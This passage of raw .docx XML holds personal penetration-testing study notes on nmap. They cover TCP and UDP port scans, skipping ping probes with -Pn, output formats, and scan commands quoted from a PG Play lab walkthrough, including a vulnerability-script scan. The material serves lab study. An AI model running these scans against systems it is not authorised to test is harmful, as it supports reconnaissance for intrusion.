          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nmap -Pn -n $IP -sU --top-ports=100</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002914">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1261"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ideally we find something like Simple Network Management Protocol (SNMP)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002915">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1261"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-n</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to never do DNS resolution, which slows things down</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002916">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1261"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But this means you don't see hostnames, which might be important so think about deleting this flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002917">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002918">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002919">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -Pn [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000291A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sC -sV [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000291B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -p- -sC -sV [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000291C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000291D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1113"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-sU</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UDP </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000291E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1113"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You need root privilege so use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000291F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1113"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try using</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Pn </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">if you aren't getting any results back </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002920">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1113"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To bypass ping probes being blocked</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002921">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002922">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002923">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1178"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-oN [filename.txt] </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to save it as a human readable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002924">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1178"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -oX [filename.xml] </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to save it as xml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002925">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1178"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-oG [filename.grep]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to save it as a grepable format</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002926">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1178"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-oA to save [filename]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to save it as all formats:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002927">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1178"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">filename.nmap (Normal)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002928">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1178"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">filename.xml (XML)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002929">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1178"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">filename.gnmap (Grepable)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000292A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000292B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UDP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, it takes a really long time so if you want, you can just scan the top 100 ports:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000292C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1109"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nmap -Pn -n $IP -sU --top-ports=100 --reason</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000292D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000292E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId854">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">My-CMSMS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play walkthrough, the author gave a whole list of nmap commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000292F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="996"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FULL TCP SCAN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002930">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="996"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nmap -p- -sT $IP -vvv --max-rate 100 --open -sCV</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Pn</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002931">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="996"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FULL UDP SCAN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002932">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="996"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nmap -p- -sU $IP -vvv --max-rate 100 --open -sCV -Pn</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="996"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NMAP VULN SCAN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002934">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="996"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nmap --script=vuln $IP -Pn -vvv -p- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002935">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002936">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here's another one:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002937">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">└─$</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo nmap -p- -sC -sV 192.168.190.79 --open</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002938">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-sV-&gt;service version scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002939">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-sC -&gt; run some additional scripts to find more info</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000293A">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p- -&gt; scan all 65535 ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000293B">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--open -&gt;return only those ports which are open</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000293C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo is used as we use a Stealth or SYN scan as it is faster than TCP or 3 way</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000293D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">handshake</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000293E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="549"/>
        </w:numPr>
